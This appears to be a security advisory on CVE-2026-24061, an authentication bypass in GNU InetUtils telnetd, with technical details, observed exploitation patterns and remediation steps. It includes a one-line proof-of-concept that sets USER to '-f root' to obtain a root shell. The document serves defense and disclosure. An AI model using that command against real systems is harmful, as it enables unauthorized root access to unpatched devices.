CVE-2026-24061

What is GNU InetUtils?

GNU InetUtils is the GNU Project's suite of common networking utilities, shipped as a standard package in nearly every Linux distribution. It provides implementations of classic network tools and services including telnetd (Telnet server), ftpd, rlogind, rshd, tftpd, ping, traceroute, and others. The telnetd component — the Telnet remote access server — is the affected component in this vulnerability. While Telnet has largely been superseded by SSH in modern enterprise environments, telnetd from GNU InetUtils remains widely deployed in legacy Linux infrastructure, embedded devices, industrial control systems (ICS/OT), routers, and network appliances that predate or cannot run SSH.

Shodan identified over 214,000 internet-exposed Telnet services at the time exploitation began in January 2026, with the heaviest concentrations in China, Brazil, Canada, Argentina, and the United States. Because InetUtils is a GNU base package, affected deployments span virtually every Linux distribution and a large ecosystem of embedded Linux devices.

Overview

CVE-2026-24061 is a CWE-88 (Argument Injection) vulnerability in GNU InetUtils telnetd. The flaw was introduced in March 2015 and went undetected for approximately 11 years across all versions from 1.9.3 through 2.7. Exploitation is trivially simple: an attacker sets the USER environment variable to the string -f root during Telnet connection negotiation using the protocol's standard NEW_ENVIRON option. The telnetd process passes this value unsanitized into a command invocation of /usr/bin/login, and the -f flag tells login to bypass authentication entirely and grant an immediate shell as the named user (root). No credentials, no prior foothold, and no interaction are required — a single Telnet connection delivers an interactive root shell.

Active exploitation began January 22, 2026, one day after CVE publication. CISA added the vulnerability to the KEV catalog on January 26, 2026. TXOne Networks observed three distinct attack wave patterns targeting the flaw, with source IPs distributed across 52 addresses in 16 countries, suggesting coordinated mass-exploitation campaigns. The vulnerability is particularly significant for OT/ICS environments where Telnet is still commonly used on embedded and legacy devices that cannot easily be upgraded.

Affected Versions

Distribution maintainers for Debian, Ubuntu, Red Hat, SUSE, Alpine, and others have released backport patches for supported releases that may still ship versions in the vulnerable range. Check the relevant distribution security advisories for package-specific fixed versions.

Technical Details

The root cause is unsafe string interpolation of a client-controlled environment variable into a login command. In the vulnerable versions of GNU InetUtils telnetd, the login command template includes a %U placeholder that is replaced with the USER environment variable:

case 'U': return getenv("USER");

This value is taken directly from the Telnet NEW_ENVIRON option negotiated during connection setup, which the client fully controls. No validation, sanitization, or argument-boundary enforcement is applied before inserting the value into the command line passed to /usr/bin/login.

The attack exploits the fact that /usr/bin/login accepts a -f username flag meaning "skip authentication and log in as this user." By setting USER to -f root, the attacker causes telnetd to construct the following command:

/usr/bin/login -h <hostname> -f root

The -f flag is interpreted as a command-line option (not as part of a username), authentication is skipped, and the session is immediately elevated to root. A single-line proof-of-concept is:

USER='-f root' telnet -a <target-ip>

The attack requires:

• A reachable telnetd listening on the target (default port 23)
• No prior credentials, authentication, or foothold
• The underlying /usr/bin/login binary to support the -f flag (standard on Linux)

The fix introduces a sanitization function in telnetd that rejects USER values beginning with a hyphen or containing shell metacharacters before constructing the login command.

Discovery

The specific individual or organization credited with discovering and reporting CVE-2026-24061 has not been publicly named in the vendor fix commits or CISA catalog entry. The CVE was published January 21, 2026, and the GNU InetUtils maintainers released two fix commits to the Codeberg repository (ccba9f7 and fd702c0) addressing the issue. The flaw itself was introduced via a source code change committed in March 2015 and persisted undetected through approximately 11 years of releases.

Exploitation Context

Exploitation in the wild began January 22, 2026, one day after CVE publication. TXOne Networks' threat telemetry documented three distinct operational patterns across 52 source IPs in 16 countries:

1. Probe-only: Attackers testing for the vulnerability without immediately executing a payload.
2. Inline command execution: Direct OS command execution delivered in the same session as the authentication bypass.
3. Downloader stagers: Commands that use curl or wget (with fallback) to fetch and execute secondary payloads.

The geographic distribution and volume of activity suggest automated, coordinated mass-exploitation rather than targeted intrusions by named threat actors. No specific ransomware group or nation-state actor has been publicly attributed to this campaign.

The vulnerability is of particular concern in OT/ICS and embedded device environments, where Telnet is still frequently the only available remote management protocol on legacy equipment. Many such devices cannot be patched, upgraded to SSH, or taken offline without significant operational impact, making network-layer controls especially important.

Remediation

1. Patch: Upgrade GNU InetUtils telnetd to version 2.7-2 or later, or apply the applicable distribution backport patch for your Linux distribution. Check your distribution's security tracker for the correct package version.
2. Disable telnetd: If Telnet is not operationally required, disable and remove the inetutils-telnetd package immediately. Telnet transmits all data including credentials in cleartext and should not be running on any internet-connected or multi-tenant system.
3. Migrate to SSH: Replace any Telnet-dependent workflows with SSH equivalents. For embedded and OT devices that only support Telnet, implement a terminal server or jump host that enforces SSH authentication for access to the Telnet-only device.
4. Block port 23: Apply firewall rules to block inbound TCP port 23 from untrusted networks. Internet-exposed Telnet services are a well-known attack surface; port 23 should never be open to the internet.
5. Network segmentation: Devices that cannot be patched or upgraded should be isolated in a separate VLAN or network segment with strict access controls and monitoring. Apply compensating controls such as authentication proxies in front of legacy Telnet endpoints.
6. Log review: Check system logs for unexpected root login sessions originating from external IPs, particularly sessions authenticated without a password. On systems using PAM, look for pam_unix entries with the login service where no password challenge was issued. Review /var/log/auth.log (Debian/Ubuntu) or /var/log/secure (RHEL/CentOS) for Telnet-initiated root sessions.